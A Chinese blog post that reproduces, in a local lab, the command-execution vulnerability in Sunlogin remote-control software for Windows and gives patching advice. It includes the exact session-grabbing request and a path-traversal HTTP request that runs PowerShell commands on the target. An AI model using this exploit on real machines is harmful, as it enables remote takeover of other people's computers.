CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

2023-10-27

CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

本文仅为验证漏洞,在本地环境测试验证,无其它目的


漏洞编号:

CNVD-2022-03672/CNVD-2022-10270


漏洞说明:

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。2022年2月5日,CNVD公开向日葵简约版存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。2022年2月15日,CNVD公开向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。


漏洞影响范围:

  • 向日葵个人版 for Windows <= 11.0.0.33
  • 向日葵简约版 <= V1.0.1.43315(2021.12)

漏洞级别:

高危


漏洞复现:

此处演示向日葵个人版,简约版没找到旧的安装包
版本:在这里插入图片描述

  1. 使用nmap扫描工具,扫描向日葵所在目标机IP,查看开放端口:】

    nmap -p 40000-65535 192.168.32.129
    
  2. 可以看到,部署向日葵的目标机开放了如下端口:
    在这里插入图片描述

  3. 依次通过浏览器访问ip+端口,直到出现如下图所示,在此环境中访问49200端口即出现JSON信息:

    IP:49200/
    

    在这里插入图片描述

  4. 尝试获取session,先测试目标机器是否存在/cgi-bin/rpc界面,浏览器继续访问:

    IP:49200/cgi-bin/rpc
    

    在这里插入图片描述

  5. 测试存在界面后,打开BP,浏览器加BP代理,在BurpSuite中获取刚才访问的界面,选择【Send to Repeater】:
    在这里插入图片描述

  6. 修改数据包为POST,并传入数据:action=verify-haras,点击【Send】,即可获取到session:
    在这里插入图片描述

  7. 修改数据包,添加session,并修改参数进行命令执行,下方ipconfig可进行修改为其他参数进行测试,例如替换为whoami:

    GET /check?	cmd=ping../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig 	HTTP/1.1
    Host: 192.168.32.129:54107
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    
    

    在这里插入图片描述


漏洞修复:

参考【贝锐

  1. PC端用户可通过官网直接升级到最新版本

  2. 通过软件检查更新

    (1)向日葵远程控制
    在这里插入图片描述

    (2)蒲公英异地组网
    在这里插入图片描述

    (3)花生壳内网穿透
    在这里插入图片描述

  3. 开启软件自动更新

    向日葵远程控制

    • 打开设置
    • 选择常规设置
    • 找到软件更新选项,并将更新选项修改为:自动更新
      在这里插入图片描述
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 的相关文章

  • Kali beef-xss实现Xss详细教程。

    免责声明 本文所介绍的内容仅做学习交流使用 严禁利用文中技术进行非法行为 否则造成一切严重后果自负 1 XSS简介 1 XSS简介 XSS作为OWASP TOP 10之一 XSS中文叫做跨站脚本攻击 Cross site scripting
  • linux系统防护

    linux系统安全防护 查看密码策略 etc login defs etc login defs文件定义了与 etc passwd和 etc shadow配套的用户限制设置 这个文件是定要存在的 缺失并不会影响系统的使用 但是也许会产生意想
  • [安全攻防进阶篇] 二.如何学好逆向分析、逆向路线推荐及吕布传游戏逆向案例

    从2019年7月开始 我来到了一个陌生的专业 网络空间安全 初入安全领域 是非常痛苦和难受的 要学的东西太多 涉及面太广 但好在自己通过分享100篇 网络安全自学 系列文章 艰难前行着 感恩这一年相识 相知 相趣的安全大佬和朋友们 如果写得
  • 【漏洞靶场】文件上传后端检测点绕过--upload-labs

    一 漏洞描述 在uploads labs第八关中 服务器采用了黑名单的方式过滤上传文件的后缀 黑名单中包含了所有违法的后缀 包括可以让所有文件都当php脚本执行的 htaccess配置文件 但是在验证函数中缺少deldot 函数 从字符串的
  • 网络安全面试必问

    项目经历 因为大家写的都是渗透相关 所以编故事也要编的圆润些 题材可以去freebuf看 https search freebuf com search search E6 8C 96 E6 B4 9E article 这里主要记录如何挖洞
  • 2022-渗透测试-git提权(Linux)

    目录 1 什么是提权 2 git提权命令 3 git的使用 1 什么是提权 提权就是通过各种办法和漏洞 提高自己在服务器中的权限 以便控制全局 利用漏洞的最终目的是获取被测系统的最高权限 即Windows中管理员账户的权限 或Linux中r
  • 操作系统论文导读(十三):HLC-PCP: A Resource Synchronization Protocol for Certifiable Mixed Criticality Scheduli

    目录 一 论文核心思想 二 相关工作 AMC 三 HLC PCP协议 3 1 协议定义 3 2 协议工作流程 3 3 协议例子 3 4 协议最坏情况阻塞时间计算 3 4 1 LO模式下的阻塞时间计算 3 4 2 HI模式下的阻塞时间计算 3
  • pikachu靶场记录之暴力破解-包括带token的密码猜解

    说明 pikachu是一个免费的php靶场 类似于dvwa 从github下载对应的项目 解压缩并放到phpstudy的www目录下即可 在phpstudy软件中开启apache mysql 访问首页 192 168 10 150 pika
  • VSCode下载和安装教程(超详细)以及解决VSCode下载速度特别慢的问题

    文章目录 1 引言 2 下载VSCode 3 解决VSCode下载速度特别慢 4 安装VSCode 1 引言 今天用WebStorm运行前端代码时 发现不太好打断点 于是 打算改用VSCode来运行前端代码 但前提是要安装VSCode 如下
  • Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)复现

    Confluence介绍 Confluence是一个专业的企业知识管理与协同软件 也可以用于构建企业wiki 使用简单 但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息 文档协作 集体讨论 信息推送 漏洞概述 Atlassian C
  • 学习Kali渗透测试笔记

    Kali渗透测试 一 什么是渗透测试 1 软件测试 2 安全测试与渗透测试 3 渗透测试 二 渗透测试的目标 1 网络硬件设备 2 主机操作系统 3 应用系统 4 数据库系统 三 渗透测试的意义 四 渗透测试的方法分类 1 按照信息掌握程度
  • 漏洞常规专业术语

    基础漏洞条例 VUL Vulnerability 漏洞 POC Proof of Concept 漏洞证明 漏洞报告中 通过一段描述或一个样例来证明漏洞确实存在 EXP Exploit 漏洞利用 某个漏洞存在EXP 意思就是该漏洞存在公开的
  • 32种针对硬件与固件的漏洞攻击

    2018年1月 全球计算机行业因为Meltdown以及Spectre这两个在处理器中存在的新型漏洞而受到威胁 这两个漏洞直接打破了分离内核以及用户内存的OS安全边界 这两个漏洞基于了现代CPU的预测执行功能 而缓解这两个漏洞带来的影响则需要
  • 5.2 主机扫描:主机探测

    目录 一 预备知识 主机扫描方法 二 实验环境 三 实验步骤 一 预备知识 主机扫描方法 主机扫描 Host Scan 是指通过对目标网络 一般为一个或多个IP网段 中主机IP地址的扫描 以确定目标网络中有哪些主机处于运行状态 主机扫描的实
  • [系统安全] 四十六.恶意软件分析 (2)静态分析Capa经典工具批量提取静态特征和ATT&CK技战术

    终于忙完初稿 开心地写一篇博客 您可能之前看到过我写的类似文章 为什么还要重复撰写呢 只是想更好地帮助初学者了解病毒逆向分析和系统安全 更加成体系且不破坏之前的系列 因此 我重新开设了这个专栏 准备系统整理和深入学习系统安全 逆向分析和恶意
  • 网络安全(黑客)自学秘籍

    想自学网络安全 黑客技术 首先你得了解什么是网络安全 什么是黑客 网络安全可以基于攻击和防御视角来分类 我们经常听到的 红队 渗透测试 等就是研究攻击技术 而 蓝队 安全运营 安全运维 则研究防御技术 无论网络 Web 移动 桌面 云等哪个
  • 为什么这么多人自学黑客,但没过多久就放弃了(掌握正确的网络安全学习路线很重要)

    网络安全是一个 不断发展和演变 的领域 以下是一个 网络安全学习路线规划 旨在帮助初学者快速入门和提高自己的技能 基础知识 网络安全的 基础知识 包括 网络结构 操作系统 编程语言 等方面的知识 学习这些基础知识对理解网络安全的原理和技术至
  • 网络安全从入门到精通(超详细)学习路线

    首先看一下学网络安全有什么好处 1 可以学习计算机方面的知识 在正式学习网络安全之前是一定要学习计算机基础知识的 只要把网络安全认真的学透了 那么计算机基础知识是没有任何问题的 操作系统 网络架构 网站容器 数据库 前端后端等等 可以说不想
  • 通过一个寒假能学会黑客技术吗?看完你就知道了

    一个寒假能成为黑客吗 资深白帽子来告诉你 如果你想的是学完去美国五角大楼内网随意溜达几圈 想顺走一点机密文件的话 劝你还是趁早放弃 但是成为一名初级黑客还是绰绰有余的 你只需要掌握好渗透测试 Web安全 数据库 搞懂web安全防护 SQL注
  • 一个寒假能学会黑客技术吗?看完你就知道了

    一个寒假能成为黑客吗 资深白帽子来告诉你 如果你想的是学完去美国五角大楼内网随意溜达几圈 想顺走一点机密文件的话 劝你还是趁早放弃 但是成为一名初级黑客还是绰绰有余的 你只需要掌握好渗透测试 Web安全 数据库 搞懂web安全防护 SQL注

随机推荐